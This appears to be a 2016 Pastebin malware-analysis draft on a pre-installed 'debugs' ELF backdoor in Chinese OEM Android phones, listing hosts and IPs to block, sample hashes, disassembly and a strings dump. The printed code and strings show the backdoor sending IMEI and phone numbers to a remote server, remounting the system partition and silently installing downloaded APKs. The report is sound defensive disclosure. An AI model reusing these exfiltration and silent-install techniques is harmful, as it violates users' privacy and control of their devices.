Advertisement
MalwareMustDie

China "OEM" Android ELF "debugs*" pre-install #backdoor

Jan 20th, 2016
2,866
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #MalwareMustDie spot analysis report (draft):
  2. #ELF China-origin "suspected" malware found pre-installed in Android phone.
  3. #package: debugsbin.apk/android.debugs.bin
  4. #Current verdict: OEM pre-install backdoored ELF. Manufactured/distributed via www.ragentek.com, OEM? PUP/UnwantedWare?
  5. #malicious act: sent credentials (ALERT!), fetch binaries (self-update?), can not confirm apk sigs in Google.
  6. #ref: http://www.observatoriodeseguridad.com/?p=230 | english translation: http://goo.gl/BCy7vf
  7. #confirmation / analysis see full thread: https://twitter.com/MalwareMustDie/status/689980357475725312
  8. #announce thread: https://twitter.com/MalwareMustDie/status/689974787876241408 (has screenshots)
  9. #thanks to ‏@timstrazz (mobile expert) for jumping in to this "uncertainty apps" case..
  10.  
  11. # BLOCK THESE:
  12. ota.ragentek.com.       120     IN      A       61.129.57.47 (hostname: hardcoded)
  13. ota1.ragentek.com.      120     IN      CNAME   iduvjfv.qiniudns.com. (hostname: hardcoded)
  14. iduvjfv.qiniudns.com.   600     IN      CNAME   ota1.ragentek.com.cdnga.net.
  15. ota1.ragentek.com.cdnga.net. 20 IN      A       14.0.44.82
  16. oyag.lhzbdvm.com.       3600    IN      A       114.80.68.223  (hostname: hardcoded) <==== active forensics PoC
  17. oyag.prugskh.net.       100     IN      A       195.22.26.248 // sinkhole  (hostname: hardcoded)
  18. oyag.prugskh.com.       100     IN      A       195.22.26.248  // sinkhole  (hostname: hardcoded)
  19. 210.51.45.89 (ip hard-coded @0x053915!12)
  20. 114.80.68.223  (ip hard-coded @0x04FC23!13)
  21.  
  22. #route info:
  23. 61.129.57.47||4812 | 61.129.0.0/17 | CHINANET-SH | CN | cndata.com | Data Communication Division
  24. 14.0.44.82||36408 | 14.0.40.0/21 | CDNETWORKSUS-02 | US | cdnetworks.com | UTILUS
  25. 114.80.68.223||4812 | 114.80.0.0/16 | CHINANET-SH | CN | chinatelecom.com.cn | ChinaNet Shanghai Province Network
  26. 210.51.45.89|mail.goodview-digital.com.|9929 | 210.51.45.0/24 | CNCNET | CN | meihua.info | Shanghai Caohejing IDC of China Netcom
  27.  
  28. #samples:
  29. [0x00007418]> ! file *
  30. debugs:    elf 32-bit lsb shared object, arm, eabi5 version 1 (sysv), dynamically linked, interpreter /system/bin/linker, stripped
  31. debugsbak: elf 32-bit lsb shared object, arm, eabi5 version 1 (sysv), dynamically linked, interpreter /system/bin/linker, stripped
  32. debugsrun: elf 32-bit lsb shared object, arm, eabi5 version 1 (sysv), dynamically linked, interpreter /system/bin/linker, stripped
  33. [0x00007418]> ! md5 *
  34. md5 (debugs) = a0061e4b77dacd1cb25b0ee0e1c7b9ce
  35. md5 (debugsbak) = a0061e4b77dacd1cb25b0ee0e1c7b9ce
  36. md5 (debugsrun) = 3e76bc08ea812adebfaa72cd72daf5d2
  37.  
  38. ## some quicky reversing for the backdoor malicious part.. (to send phone information to remote host w/o consent)
  39. ## there are more of these using above hostnames/ip to communicate, some for registration or updates
  40. ## there are also some data sent for the "sales" purpose.
  41.  
  42. ;; snips:
  43. 0x0742a   movs   r0, #3
  44. 0x0742c   mov    r1, r0
  45. 0x0742e   add    r2, pc  ; "debugs"
  46. 0x07430   add    r3, pc  ; "push_config_init start \n"
  47.     :
  48. 0x07454   movs   r0, #3
  49. 0x07456   mov    r1, r0
  50. 0x07458   add    r2, pc  ; "debugs"
  51. 0x0745a   add    r3, pc  ; "push_config_init database is not exist "
  52.     :
  53. 0x07472   mov    r1, r0
  54. 0x07474   add    r2, pc  ; "debugs"
  55. 0x07476   add    r3, pc  ; "push_config_init database is create[...]"
  56.    :
  57. 0x0747c   ldr    r1, =(aselectfromsqli - 0x748e)
  58. 0x0747e   add    r6, sp, #0x40+var_24
  59. 0x07480   add    r7, sp, #0x40+var_30
  60. 0x07482   movs   r5, #0
  61. 0x07484   str    r6, [sp,#0x40+var_40]
  62. 0x07486   str    r7, [sp,#0x40+var_3c]
  63. 0x07488   ldr    r0, [sp,#0x40+var_34]
  64. 0x0748a   add    r1, pc  ; "select * from sqlite_master where type="
  65.     :
  66. 0x074c6   add    r2, pc  ; "debugs"
  67. 0x074c8   mov    r1, r0
  68. 0x074ca   add    r3, pc  ; "push_search table[t_config] result=%d\n"
  69.    :
  70. // backdoor 1 starts.. regist matter?
  71.  
  72. 0x077a8   ldr    r7, =(adomain - 0x77b0)
  73. 0x077aa   mov    r1, r4
  74. 0x077ac   add    r7, pc  ; "domain"
  75. 0x077ae   mov    r0, r7
  76. 0x077b0   bl     0x0647c
  77. 0x077b4   cmp    r0, #1
  78. 0x077b6   str    r0, [sp,#0x40+var_28]
  79. 0x077b8   beq    loc_77c4
  80. 0x077ba   ldr    r1, =(0x04AB84 - 0x77c2)
  81. 0x077bc   mov    r0, r7
  82. 0x077be   add    r1, pc  ; "http://oyag.lhzbdvm.com:8082/padm"
  83. 0x077c0   bl     0x060cc
  84.  
  85. // backdoor2 starts...
  86.  
  87. 0x043DEA ldr    r2, =(0x048C4C - 0x043DF6)
  88. 0x043DEC ldr    r3, =(0x04F32B - 0x043DF8)
  89. 0x043DEE movs   r0, #3
  90. 0x043DF0 mov    r1, r0
  91. 0x043DF2 add    r2, pc  ; "debugs"
  92. 0x043DF4 add    r3, pc  ; "sendDataToServer start"
  93.           :
  94. 0x043E7C ldr    r0, =(0x0495B9 - 0x043E84)
  95. 0x043E7E mov    r1, r8
  96. 0x043E80 add    r0, pc  ; "PORT"
  97. 0x043E82 BL     sub_647C
  98.           :
  99. 0x043E98 mov    r1, r0
  100. 0x043E9A add    r2, pc  ; "debugs"
  101. 0x043E9C add    r3, pc  ; "IP=%s,PORT
  102.    :
  103. 0x043EA2 movs   r0, #2
  104. 0x043EA4 strh.w          r0, [sp,#0x8B8+var8A4]
  105. 0x043EA8 mov    r0, r8  ; char *
  106. 0x043EAA blx    atoi
  107. 0x043EAE rev16           r0, r0
  108. 0x043EB0 strh.w          r0, [sp,#0x8B8+var8A2]
  109. 0x043EB4 mov    r0, r7
  110. 0x043EB6 blx    inet_addr
  111. 0x043EBA movs   r2, #0x10
  112. 0x043EBC str    r0, [sp,#0x8B8+var8A0]
  113. 0x043EBE add    r1, sp, #0x8B8+var8A4
  114. 0x043EC0 mov    r0, r4
  115. 0x043EC2 blx    connect
  116.  
  117.     :
  118. 0x043F1E mov    r1, r0
  119. 0x043F20 add    r2, pc  ; "debugs"
  120. 0x043F22 add    r3, pc  ; "strRequest===%s,len
  121.           ;
  122. 0x043F52 ldr.w           r10, =(0x04F3AF - 0x043F5E)
  123. 0x043F56 add    r6, pc
  124. 0x043F58 add    r7, pc  ; "debugs"
  125. 0x043F5A add    r10, pc ; "strResponse=%
  126.           :
  127. 0x043F88 ldr    r1, =(0x043F88 - 0x043F90)
  128. 0x043F8A mov    r0, r5  ; char *
  129. 0x043F8C add    r1, pc  ; "HTTP/1.1 200 OK"
  130. 0x043F8E blx    strstr
  131. 0x043F92 cmp    r0, #0
  132.            :
  133. 0x043FC8 mov    r1, r0
  134. 0x043FCA add    r2, pc  ; "debugs"
  135. 0x043FCC add    r3, pc  ; "request ok..%d--
  136.          :
  137. 0x043FFC mov    r1, r0
  138. 0x043FFE add    r2, pc  ; "debugs"
  139. 0x044000 add    r3, pc  ; "outstr=
  140.            :
  141. 0x04401C ldr    r2, =(0x048C4C - 0x04402A)
  142. 0x04401E ldr    r3, =(0x04F3EF 0x04402C)
  143. 0x044020 movs   r0, #3
  144. 0x044022 str    r5, [sp,#0x8B8+var8B8]
  145. 0x044024 mov    r1, r0
  146. 0x044026 add    r2, pc  ; "debugs"
  147. 0x044028 add    r3, pc  ; "sendDataToServer rtn=%
  148.    :
  149. 0x04415E movs    r4, #1
  150. 0x044160 add     r10, pc ; "POST /pagt/agent?data={\"name\":\"c_regist"
  151. 0x044162 add     r11, pc ; "\",\"version\":\""
  152.    :
  153. 0x04419C ldr     r1, =(0x04F493 - 0x0441A6)
  154. 0x04419E mov.w   r2, #0x0400
  155. 0x0441A2 add     r1, pc  ; "\",\"model\":\""
  156. 0x0441A4 add     r0, sp, #0x0488+var42C
  157. 0x0441A6 blx     __strcat_chk
  158. 0x0441AA mov     r1, r7
  159. 0x0441AC mov.w   r2, #0x0400
  160. 0x0441B0 add     r0, sp, #0x0488+var42C
  161. 0x0441B2 blx     __strcat_chk
  162. 0x0441B6 ldr     r1, =(0x04F49F - 0x0441C0)
  163. 0x0441B8 mov.w   r2, #0x0400
  164. 0x0441BC add     r1, pc  ; "\",\"c_bin_version\":\""
  165. 0x0441BE add     r0, sp, #0x0488+var42C
  166. 0x0441C0 blx     __strcat_chk
  167. 0x0441C4 mov     r1, r8
  168. 0x0441C6 mov.w   r2, #0x0400
  169. 0x0441CA add     r0, sp, #0x0488+var42C
  170. 0x0441CC blx     __strcat_chk
  171. 0x0441D0 ldr     r1, =(0x04F4B3 - 0x0441DA)
  172. 0x0441D2 mov.w   r2, #0x0400
  173. 0x0441D6 add     r1, pc  ; "\",\"c_apk_version\":\""
  174. 0x0441D8 add     r0, sp, #0x0488+var42C
  175. 0x0441DA blx     __strcat_chk
  176. 0x0441DE ldr     r1, [SP,#0x0488+var478]
  177. 0x0441E0 mov.w   r2, #0x0400
  178. 0x0441E4 add     r0, sp, #0x0488+var42C
  179. 0x0441E6 blx     __strcat_chk
  180. 0x0441EA ldr     r1, =(0x04F4C7 - 0x0441F4)
  181. 0x0441EC mov.w   r2, #0x0400
  182. 0x0441F0 add     r1, pc  ; "\",\"imei\":\""
  183. 0x0441F2 add     r0, sp, #0x0488+var42C
  184. 0x0441F4 blx     __strcat_chk
  185. 0x0441F8 ldr     r1, [SP,#0x0488+var474]
  186. 0x0441FA mov.w   r2, #0x0400
  187. 0x0441FE add     r0, sp, #0x0488+var42C
  188. 0x044200 blx     __strcat_chk
  189. 0x044204 ldr     r1, =(0x04F4D2 - 0x04420E)
  190. 0x044206 mov.w   r2, #0x0400
  191. 0x04420A add     r1, pc  ; "\",\"phoneNumber1\":\""
  192. 0x04420C add     r0, sp, #0x0488+var42C
  193. 0x04420E blx     __strcat_chk
  194. 0x044212 ldr     r1, [SP,#0x0488+var470]
  195. 0x044214 mov.w   r2, #0x0400
  196. 0x044218 add     r0, sp, #0x0488+var42C
  197. 0x04421A blx     __strcat_chk
  198. 0x04421E ldr     r1, =(0x04F4E5 - 0x044228)
  199. 0x044220 mov.w   r2, #0x0400
  200. 0x044224 add     r1, pc  ; "\",\"phoneNumber2\":\""
  201. 0x044226 add     r0, sp, #0x0488+var42C
  202. 0x044228 blx     __strcat_chk
  203. 0x04422C ldr     r1, [SP,#0x0488+var46C]
  204. 0x04422E mov.w   r2, #0x0400
  205. 0x044232 add     r0, sp, #0x0488+var42C
  206. 0x044234 blx     __strcat_chk
  207. 0x044238 ldr     r1, =(0x04F4F8 - 0x044242)
  208. 0x04423A mov.w   r2, #0x0400
  209. 0x04423E add     r1, pc  ; "\",\"countryName\":\""
  210. 0x044240 add     r0, sp, #0x0488+var42C
  211. 0x044242 blx     __strcat_chk
  212. 0x044246 ldr     r1, [SP,#0x0488+var468]
  213. 0x044248 mov.w   r2, #0x0400
  214. 0x04424C add     r0, sp, #0x0488+var42C
  215. 0x04424E blx     __strcat_chk
  216. 0x044252 ldr     r1, =(0x04F50A - 0x04425C)
  217. 0x044254 mov.w   r2, #0x0400
  218. 0x044258 add     r1, pc  ; "\"}} HTTP/1.1\r\nHost: "
  219. 0x04425A add     r0, sp, #0x0488+var42C
  220. 0x04425C blx     __strcat_chk
  221. 0x044260 movs    r2, #0x32 ; size_t
  222. 0x044262 movs    r1, #0  ; int
  223. 0x044264 add     r0, sp, #0x0488+var460 ; void *
  224. 0x044266 blx     memset
  225. 0x04426A mov     r1, r4
  226. 0x04426C add     r0, sp, #0x0488+var460
  227. 0x04426E BL      0x062E8
  228. 0x044272 add     r1, sp, #0x0488+var460
  229. 0x044274 mov.w   r2, #0x0400
  230. 0x044278 add     r0, sp, #0x0488+var42C
  231. 0x04427A blx     __strcat_chk
  232. 0x04427E ldr     r1, =(0x04F51F - 0x044288)
  233. 0x044280 mov.w   r2, #0x0400
  234. 0x044284 add     r1, pc  ; "\r\nConnection: Close\r\n\r\n"
  235. 0x044286 add     r0, sp, #0x0488+var42C
  236. 0x044288 blx     __strcat_chk
  237.  
  238. .. and so on.. grab the samples in tgz at the blog stated in the above link.
  239.  
  240. ## These strings gave you enough idea of what its processes are:
  241.  
  242. .ident :0x0463F8 Android
  243. .rodata:0x048954 am broadcast -a android.debugs.bin.newmsg
  244. .rodata:0x048B54 pm install -r
  245. .rodata:0x048BB8 rm -rf
  246. .rodata:0x048C1C /proc/mounts
  247. .rodata:0x048C29 %255s %255s %*s %*s %d %d\n
  248. .rodata:0x048C44 /system
  249. .rodata:0x048C4C debugs
  250. .rodata:0x048C53 debugs mtk remount start....\n
  251. .rodata:0x048C71 none
  252. .rodata:0x048C76 debugs mtk remount result....=%d\n
  253. .rodata:0x048C98 52
  254. .rodata:0x048C9B 35
  255. .rodata:0x048C9E /dev/block/platform/mtk-msdc.0/by-name/system
  256. .rodata:0x048CCC /emmc@android
  257. .rodata:0x048CDA ext4
  258. .rodata:0x048CDF debugs remount RW succeeded\n
  259. .rodata:0x048CFC debugs remount RW failed== %s\n
  260. .rodata:0x048D1B debugs mtk romount result....=%d\n
  261. .rodata:0x048D3D ro.build.type
  262. .rodata:0x048D4C user
  263. .rodata:0x048D51 debugs remount RO succeeded\n
  264. .rodata:0x048D6E debugs remount RO failed== %s\n
  265. .rodata:0x048D8D IMEI
  266. .rodata:0x048D92 MOBILE_VERSION
  267. .rodata:0x048DA1 MOBILE_MODEL
  268. .rodata:0x048DAE P2
  269. .rodata:0x048DB1 v5.0
  270. .rodata:0x048DB6 registRtn=%d\n
  271. .rodata:0x048DC4 salesServices \n
  272. .rodata:0x048DD4 MOBILE_PLATFORM
  273. .rodata:0x048DE4 82
  274. .rodata:0x048DE7 92
  275. .rodata:0x048DEA 72
  276. .rodata:0x048DED === nv_item=%d, paltform=%s\n
  277. .rodata:0x048E0A === NVRam read error \n
  278. .rodata:0x048E21 ===NVRam success registerTag=%d,%d,rec_size=%d,rec_num=%d\n
  279. .rodata:0x048E5C === has registed, stop sales services \n
  280. .rodata:0x048E84 === regist success, but write tag failed \n
  281. .rodata:0x048EAF === regist success, and write tag success \n
  282. .rodata:0x048EDB === regist success, stop sales services \n
  283. .rodata:0x048F05 getMobileRunTime=%d\n
  284. .rodata:0x048F1A time recive, need send registed\n
  285. .rodata:0x048F3B === time recive, but write tag failed \n
  286. .rodata:0x048F63 === time recive, and write tag success \n
  287. .rodata:0x048F8C time recive, do send registed\n
  288. .rodata:0x048FAB sleepTimeOut timeout=%d \n
  289. .rodata:0x048FC5 DEVICE_LAST_REQ_TIME
  290. .rodata:0x048FDA %d
  291. .rodata:0x048FDD sleepTimeOut time over last_time=%ld \n
  292. .rodata:0x049004 sleepTimeOut time over curr_time=%ld,last_time=%ld,timeout=%d \n
  293. .rodata:0x049046 http_download being=%s\n
  294. .rodata:0x04905E http_downLoad create http failed!\n
  295. .rodata:0x049081 http_downLoad load icon-url failed! errno=%#x url=%s \n
  296. .rodata:0x0490B8 /sdcard/Download/
  297. .rodata:0x0490CA download icon finish! ok.\n
  298. .rodata:0x0490E5 download icon error! errno=%#x\n
  299. .rodata:0x049105 push_debugs_doPushClient start \n
  300. .rodata:0x049126 bin_server_id
  301. .rodata:0x049134 apk_server_id
  302. .rodata:0x049142 bin_version
  303. .rodata:0x04914E apk_version
  304. .rodata:0x04915A bin_url
  305. .rodata:0x049162 apk_url
  306. .rodata:0x04916A push_debugs_do_push_apk bin_server_id=%s,apk_server_id=%s,bin_version=%s,apk_version=%s,bin_url=%s,apk_url=%s \n
  307. .rodata:0x0491DA create http failed!\n
  308. .rodata:0x0491EF load client-bin-url failed! errno=%#x url=%s \n
  309. .rodata:0x04921E download client-bin-finish! ok.\n
  310. .rodata:0x04923F download client-bin-error! errno=%#x\n
  311. .rodata:0x049265 load client-apk-url failed! errno=%#x url=%s \n
  312. .rodata:0x049294 debugsbin.apk
  313. .rodata:0x0492A2 download client-apk finish! ok.\n
  314. .rodata:0x0492C3 pm install -r /sdcard/Download/debugsbin.apk
  315. .rodata:0x0492F0 download client-apk error! errno=%#x\n
  316. .rodata:0x049316 push_debugs_doPushClient end \n
  317. .rodata:0x049335 parseHttpRtnStr start.. push_debugs res=%d \n
  318. .rodata:0x049362 code
  319. .rodata:0x049367 name
  320. .rodata:0x04936C push_apk
  321. .rodata:0x049375 push_link
  322. .rodata:0x04937F push_text
  323. .rodata:0x049389 push_client
  324. .rodata:0x049395 push_config
  325. .rodata:0x0493A1 push_commands
  326. .rodata:0x0493AF parseHttpRtnStr has new data. \n
  327. .rodata:0x0493CF parseHttpRtnStr has not any data . \n
  328. .rodata:0x0493F4 details
  329. .rodata:0x0493FC parseHttpRtnStr response.code=%s,response.name=%s \n
  330. .rodata:0x049430 doPushCommand start \n
  331. .rodata:0x049446 server_id
  332. .rodata:0x049450 title
  333. .rodata:0x049456 comments
  334. .rodata:0x04945F commands
  335. .rodata:0x049468 doPushCommand server_id=%s,title=%s,comments=%s,commands=%s \n
  336. .rodata:0x0494A8 61
  337. .rodata:0x0494AB doPushCommand system ok!! status = %d\n
  338. .rodata:0x0494D2 doPushCommand system error!! status = %d\n
  339. .rodata:0x0494FE update local database success.\n
  340. .rodata:0x04951E update local database failed.\n
  341. .rodata:0x04953D doPushCommand end \n
  342. .rodata:0x049551 doPushConfig start \n
  343. .rodata:0x049566 ip
  344. .rodata:0x049569 port
  345. .rodata:0x04956E url
  346. .rodata:0x049572 time_out
  347. .rodata:0x04957B doPushText server_id=%s,ip=%s,port=%s,url=%s,time_out=%s \n
  348. .rodata:0x0495B6 IP
  349. .rodata:0x0495B9 PORT
  350. .rodata:0x0495BE TIME_OUT
  351. .rodata:0x0495C7 DOMAIN
  352. .rodata:0x0495D0 51
  353. .rodata:0x0495D3 doPushConfig end \n
  354. .rodata:0x0495E6 doPushText start \n
  355. .rodata:0x0495F9 icon
  356. .rodata:0x0495FE doPushText server_id=%s,title=%s,comments=%s,icon=%s \n
  357. .rodata:0x049635 --es serverId \"
  358. .rodata:0x049645 \" --es title \"
  359. .rodata:0x049654 \" --es comments \"
  360. .rodata:0x049666 \" --es icon \"
  361. .rodata:0x049674 \" --es type
  362. .rodata:0x049681 \"pushText\"
  363. .rodata:0x04968C commandsStr=%s\n
  364. .rodata:0x04969E 00
  365. .rodata:0x0496A1 doPushText end \n
  366. .rodata:0x0496B2 doPushLink start \n
  367. .rodata:0x0496C5 doPushLink server_id=%s,title=%s,comments=%s,url=%s,icon=%s \n
  368. .rodata:0x049703 \" --es url \"
  369. .rodata:0x049710 \"pushLink\"
  370. .rodata:0x04971D doPushLink end \n
  371. .rodata:0x04972E doPushApk start \n
  372. .rodata:0x049740 package_name
  373. .rodata:0x04974D install_type
  374. .rodata:0x04975A doPushApk server_id=%s,title=%s,comments=%s,url=%s,package=%s,icon=%s,install_type=%s \n
  375. .rodata:0x0497B2 12
  376. .rodata:0x0497B7 \" --es package \"
  377. .rodata:0x0497C8 \"SilentInstallation\"
  378. .rodata:0x0497DD \"DownloadAndInstall\"
  379. .rodata:0x0497F2 doPushApk end \n
  380. .rodata:0x049802 push_debugs begin start... \n
  381. .rodata:0x04981F mkdir /sdcard/Download
  382. .rodata:0x049836 rm /sdcard/Download/debugs
  383. .rodata:0x049851 rm /sdcard/Download/debugsbin.apk
  384. .rodata:0x049873 am broadcast -a android.debugs.bin.newmsg --es type init
  385. .rodata:0x0498AC broadcast debugs---%d\n
  386. .rodata:0x0498C3 chmod 755 system/bin/unint8int
  387. .rodata:0x0498E2 CLIENT_BIN_VERSION
  388. .rodata:0x0498F5 CLIENT_APK_VERSION
  389. .rodata:0x049908 PHONE_NUMBER_1
  390. .rodata:0x049917 PHONE_NUMBER_2
  391. .rodata:0x049926 COUNTRY_CODE
  392. .rodata:0x049933 rtnstr == 00\n
  393. .rodata:0x049941 01
  394. .rodata:0x049944 rtnstr == 01\n
  395. .rodata:0x049952 sendRegisteData fail!!!!\n
  396. .rodata:0x04996C DEVICE_START_TIMES
  397. .rodata:0x04997F DEVICE_START_TIME
  398. .rodata:0x049991 count_time_rtn=%d,deviceST=%s,currT=%ld,lastT=%ld\n
  399. .rodata:0x0499C4 totalMins=%d\n
  400. .rodata:0x0499D2 lasttime=%d,curr_time=%d\n
  401. .rodata:0x0499EC push_timeout=%ld\n
  402. .rodata:0x0499FE have no new data---\n
  403. .rodata:0x049A13 rtn1=%d\n
  404. .rodata:0x049A1C rtn2=%d\n
  405. .rodata:0x049A25 have new data---\n
  406. .rodata:0x049A37 response.name=%s\n
  407. .rodata:0x049A49 getSyncData open error
  408. .rodata:0x049A60 getSyncData table[t_push_infos] result=%d \n
  409. .rodata:0x049A8C getSyncData table[t_push_infos] serverId=%s,type=%s,flag=%s,date=%s \n
  410. .rodata:0x049AD2 getSyncData database close fail \n
  411. .rodata:0x049AF4 getSyncData database close success \n
  412. .rodata:0x049B19 push_config_getRequestURL start \n
  413. .rodata:0x049B3B push_config_getRequestURL end \n
  414. .rodata:0x049B5B I am a boy
  415. .rodata:0x049B66 push_config_insert begin \n
  416. .rodata:0x049B81 push_config_getUUID_db open error
  417. .rodata:0x049BA3 '; insert into t_config(name,value) values('
  418. .rodata:0x049BD0 ','
  419. .rodata:0x049BD4 ')
  420. .rodata:0x049BD7 push_config_insert fail:%s, num:%d \n
  421. .rodata:0x049BFC push_config_insert database close fail \n
  422. .rodata:0x049C25 push_config_insert database close success \n
  423. .rodata:0x049C51 no ip address
  424. .rodata:0x049C5F HostName:%s\n
  425. .rodata:0x049C6C getIPConfig times:%d\n
  426. .rodata:0x049C82 getIPConfig parse ip.... !\n
  427. .rodata:0x049CA0 push_search table[t_config] result=%d where name='%s'\n
  428. .rodata:0x049CD7 push_search table[t_config] result=%d value=%s where name='%s'\n
  429. .rodata:0x049D17 -1
  430. .rodata:0x049D1A push_config_getConfigByName database close fail \n
  431. .rodata:0x049D4C push_config_getConfigByName database close success \n
  432. .rodata:0x049D81 push_config_getTimeOut start....................
  433. .rodata:0x049DB2 ' where name = '
  434. .rodata:0x049DC3 push_updateConfig success result=%d\n
  435. .rodata:0x049DE8 push_updateConfig failed result=%d\n
  436. .rodata:0x049E0C push_config_updateConfig database close fail \n
  437. .rodata:0x049E3B push_config_updateConfig database close success \n
  438. .rodata:0x049E6D insertPushInfo start \n
  439. .rodata:0x049E84 push_config_insertPushInfo open error
  440. .rodata:0x049EAA push_config_insertPushInfo fail:%s, num:%d \n
  441. .rodata:0x049ED7 push_config_insertPushInfo database close fail \n
  442. .rodata:0x049F08 push_config_insertPushInfo database close success \n
  443. .rodata:0x049F3C push_config_updatePushInfoFlag open error
  444. .rodata:0x049F66 ',update_time='
  445. .rodata:0x049F76 ' ,is_remote_sync='0' where server_id='
  446. .rodata:0x049F9E ' and type='
  447. .rodata:0x049FAB sql=%s
  448. .rodata:0x049FB2 push_config_updatePushInfoFlag fail:%s, num:%d \n
  449. .rodata:0x049FE3 push_config_updatePushInfoFlag database close fail \n
  450. .rodata:0x04A018 push_config_updatePushInfoFlag database close success \n
  451. .rodata:0x04A050 push_config_updatePushInfoSync open error
  452. .rodata:0x04A07A ' where server_id='
  453. .rodata:0x04A08E updatePushInfoSync,sql=%s
  454. .rodata:0x04A0A8 push_config_updatePushInfoSync fail:%s, num:%d \n
  455. .rodata:0x04A0D9 push_config_updatePushInfoSync database close fail \n
  456. .rodata:0x04A10E push_config_updatePushInfoSync database close success \n
  457. .rodata:0x04A146 push_config_getFlagPushInfo open error
  458. .rodata:0x04A16D ' order by server_id limit 1
  459. .rodata:0x04A18A push_config_getFlagPushInfo table[t_push_infos] result=%d where server_id='%s'\n
  460. .rodata:0x04A1DA push_config_getFlagPushInfo table[t_push_infos] result=%d flag=%s where server_id='%s'\n
  461. .rodata:0x04A232 push_config_getFlagPushInfo database close fail \n
  462. .rodata:0x04A264 push_config_getFlagPushInfo database close success \n
  463. .rodata:0x04A299 getConfigByNameFromAPK open error
  464. .rodata:0x04A2BB getConfigByNameFromAPK table[t_config] result=%d where name='%s'\n
  465. .rodata:0x04A2FD getConfigByNameFromAPK table[t_config] result=%d value=%s where name='%s'\n
  466. .rodata:0x04A348 getConfigByNameFromAPK database close fail \n
  467. .rodata:0x04A375 getConfigByNameFromAPK database close success \n
  468. .rodata:0x04A3A5 updatePushInfoAPKSync open error
  469. .rodata:0x04A3C6 updatePushInfoAPKSync sql=%s
  470. .rodata:0x04A3E3 updatePushInfoAPKSync fail:%s, num:%d \n
  471. .rodata:0x04A40B updatePushInfoAPKSync database close fail \n
  472. .rodata:0x04A437 updatePushInfoAPKSync database close success \n
  473. .rodata:0x04A466 syncApkDataToLocal open error
  474. .rodata:0x04A484 syncApkDataToLocal table[t_push_infos] rows=%d,columns=%d\n
  475. .rodata:0x04A4BF syncApkDataToLocal table[t_push_infos] serverId=%s,type=%s,flag=%s,updateTime=%s\n
  476. .rodata:0x04A511 syncApkDataToLocal database close fail \n
  477. .rodata:0x04A53A syncApkDataToLocal database close success \n
  478. .rodata:0x04A566 push_config_getUUID_db open error\n
  479. .rodata:0x04A589 getUUIDFromSettings open error
  480. .rodata:0x04A5A8 SELECT value FROM secure WHERE name='android_id'
  481. .rodata:0x04A5D9 getUUIDFromSettings table[secure] result=%d where name='android_id'\n
  482. .rodata:0x04A61E getUUIDFromSettings table[secure] result=%d value=%s where name='android_id'\n
  483. .rodata:0x04A66C getUUIDFromSettings database close fail \n
  484. .rodata:0x04A696 getUUIDFromSettings database close success \n
  485. .rodata:0x04A6C3 push_config_init start \n
  486. .rodata:0x04A6DC push_config_init database is not exist \n
  487. .rodata:0x04A705 push_config_init database is create success or exist \n
  488. .rodata:0x04A73C SELECT * FROM sqlite_master WHERE type='table' AND name='t_config'
  489. .rodata:0x04A77F push_config_init table[t_config] search fail \n
  490. .rodata:0x04A7AE push_search table[t_config] result=%d\n
  491. .rodata:0x04A7D5 create table t_config(ID integer primary key autoincrement,name nvarchar(30),value nvarchar(30))
  492. .rodata:0x04A836 push_config_init table[t_config] create fail \n
  493. .rodata:0x04A865 push_config_init table[t_config] create success \n
  494. .rodata:0x04A897 push_config_init table[t_config] is exist \n
  495. .rodata:0x04A8C3 SELECT * FROM sqlite_master WHERE type='table' AND name='t_push_infos'
  496. .rodata:0x04A90A push_config_init table[t_push_infos] search fail \n
  497. .rodata:0x04A93D push_search table[t_push_infos] result=%d\n
  498. .rodata:0x04A968 create table t_push_infos(ID integer primary key autoincrement,server_id nvarchar(20),type nvarchar(2),title nvarchar(100),comments nvarchar(500), url nvarchar(100), package nvarchar(30),icon nvarchar(100), installType nvarchar(2),flag nvarchar(2),is_remote_sync nvarchar(2),update_time nvarchar(25))
  499. .rodata:0x04AA95 push_config_init table[t_push_infos] create fail \n
  500. .rodata:0x04AAC8 push_config_init table[t_push_infos] create success \n
  501. .rodata:0x04AAFE push_config_init table[t_push_infos] is exist \n
  502. .rodata:0x04AB2E push_config_init database close fail \n
  503. .rodata:0x04AB55 push_config_init database close success \n
  504. .rodata:0x04AB7F 8082
  505. .rodata:0x04AB84 http://oyag.lhzbdvm.com:8082/padm
  506. .rodata:0x04ABA6 insertConfig-------%s\n
  507. .rodata:0x04ABBD push_config_getSalesTestUrlTag open error\n
  508. .rodata:0x04ABE8 getSalesTestUrlTag open error
  509. .rodata:0x04AC06 SELECT value FROM system WHERE name='ota_server_url'
  510. .rodata:0x04AC3B getSalesTestUrlTag table[system] result=%d where name='ota_server_url'\n
  511. .rodata:0x04AC83 getSalesTestUrlTag table[system] result=%d value=%s where name='ota_server_url'\n
  512. .rodata:0x04ACD4 getSalesTestUrlTag database close fail \n
  513. .rodata:0x04ACFD getSalesTestUrlTag database close success \n
  514. .rodata:0x04AD2B UUID
  515. .rodata:0x04AD30 IS_REGISTERED
  516. .rodata:0x04AD3E /data/data/com.mediatek.mobileaudioconnction/databases/audio.db
  517. .rodata:0x04AD7E /data/data/com.android.providers.settings/databases/settings.db
  518. .rodata:0x04ADBE system/bin/unint8int
  519. .rodata:0x04ADD3 SQLITE_
  520. .rodata:0x04ADDB SYSTEM_MALLOC
  521. .rodata:0x04ADE9 THREADSAFE=1
  522. .rodata:0x04ADF6 922337203685477580
  523. .rodata:0x04AE09 SET NULL
  524. .rodata:0x04AE12 SET DEFAULT
  525. .rodata:0x04AE1E CASCADE
  526. .rodata:0x04AE26 RESTRICT
  527. .rodata:0x04AE2F NO ACTION
  528. .rodata:0x04AE39 UNION ALL
  529. .rodata:0x04AE43 INTERSECT
  530. .rodata:0x04AE4D EXCEPT
  531. .rodata:0x04AE54 UNION
  532. .rodata:0x04AE5A INTEGER
  533. .rodata:0x04AE62 create
  534. .rodata:0x04AE69 trigger
  535. .rodata:0x04AE71 temp
  536. .rodata:0x04AE76 temporary
  537. .rodata:0x04AE80 end
  538. .rodata:0x04AE84 explain
  539. .rodata:0x04AE8C 2014-04-03 16:53:12 a611fa96c4a848614efe899130359c9f6fb889c3
  540. .rodata:0x04AEC9 _ROWID_
  541. .rodata:0x04AED1 ROWID
  542. .rodata:0x04AED7 OID
  543. .rodata:0x04AEDB unknown error
  544. .rodata:0x04AEE9 abort due to ROLLBACK
  545. .rodata:0x04AEFF unordered
  546. .rodata:0x04AF09 sz=[0-9]*
  547. .rodata:0x04AF13 string or blob too big
  548. .rodata:0x04AF2A integer
  549. .rodata:0x04AF32 text
  550. .rodata:0x04AF37 real
